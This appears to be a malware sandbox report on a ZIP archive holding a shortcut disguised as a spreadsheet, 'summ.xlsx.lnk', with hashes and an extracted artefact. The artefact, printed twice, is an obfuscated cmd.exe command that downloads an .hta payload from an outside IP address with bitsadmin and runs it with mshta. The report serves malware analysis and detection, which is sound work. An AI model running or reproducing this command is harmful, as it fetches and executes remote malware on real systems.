Malicious
Malicious

b5ea8c6b6fc0294adfb1084149d98933

ZIP Archive
|
MD5: b5ea8c6b6fc0294adfb1084149d98933
|
Size: 7.21 KB
|
application/zip

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b5ea8c6b6fc0294adfb1084149d98933
Sha1
66a9e431a2a6b388800b946d2677686241f84132
Sha256
3c5ca1d037d3d3ac89fb1415a4b374e4ead9f36c466b7917fa4f009e0a834b5f
Sha384
f4eb767e15530c050462abf5e120f3b3bb16d61d89cde67fec23d9487033fee19279479a5f9760ef7aa12f32e1dade98
Sha512
b2138286c2668519b142530dc57031566d8619d27e104f7dfbe6efd05460cb2da71819f7335240d928a3059263f09bb3d3a7b86dbd912738e8b30e057ec788fd
SSDeep
24:9kZKk/9nlzgm+G0/gTlF0gJFof1GRziuEbnWwmLey6:9CKEhlMVTYrHFof1vuEawmE
TLSH
E1E1C05033BE9200F2B6C675CD75B764CF4AFD009A7696C80AB2225C9C31B649D21B29
File Structure
b5ea8c6b6fc0294adfb1084149d98933
Malicious
summ.xlsx.lnk
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^D^d^Z^E^m^5^r^r^f^3^Q^W^F^0^9^ ^/^d^o^w^n^l^o^a^d^ http://46.161.0.94/Mirzbow/artifactperformance.hta ^%^T^E^M^P^%^\XSJwreBnNCprgVixrzWUXQBu.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\XSJwreBnNCprgVixrzWUXQBu.^h^t^a && cmd /c !mycmd!
b5ea8c6b6fc0294adfb1084149d98933 (7.21 KB)
File Structure
b5ea8c6b6fc0294adfb1084149d98933
Malicious
summ.xlsx.lnk
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

cmd.exe /v:on /c set mycmd=b^i^t^s^a^d^m^i^n^ ^/^t^r^a^n^s^f^e^r^ ^D^d^Z^E^m^5^r^r^f^3^Q^W^F^0^9^ ^/^d^o^w^n^l^o^a^d^ http://46.161.0.94/Mirzbow/artifactperformance.hta ^%^T^E^M^P^%^\XSJwreBnNCprgVixrzWUXQBu.^h^t^a^ ^&^&^ ^m^s^h^t^a^.^e^x^e^ ^%^T^E^M^P^%^\XSJwreBnNCprgVixrzWUXQBu.^h^t^a && cmd /c !mycmd!

Malicious

b5ea8c6b6fc0294adfb1084149d98933 > summ.xlsx.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙